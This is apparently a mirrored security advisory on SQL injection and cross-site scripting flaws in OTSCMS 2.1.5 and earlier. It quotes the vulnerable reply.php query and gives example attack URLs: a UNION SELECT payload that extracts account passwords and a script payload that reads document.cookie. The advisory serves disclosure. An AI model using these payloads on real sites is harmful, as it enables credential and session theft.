Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16005
HistoryFeb 08, 2007 - 12:00 a.m.

OTSCMS <= 2.1.5 (SQL/XSS) Multiple Remote Vulnerabilities

2007-02-0800:00:00
vulners.com
26

		               			 Coding 4 Fun     						 


[SQL]

Vulnerable Code in [path]/mod/PM/reply.php

line 22-26

extract( $http->extract('id') );

// reads message
$pm = $db->query('SELECT [pms].`name` AS `name` […] ' AND [pms].`id` = ' . $id)->fetchAll(); <—
$pm = $pm[0];

Example :

http://[target]/[path]/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts ;


[XSS]

http://[target]/[path]/forum.php?module=User&command=profile&name=<script>alert(document.cookie);</script>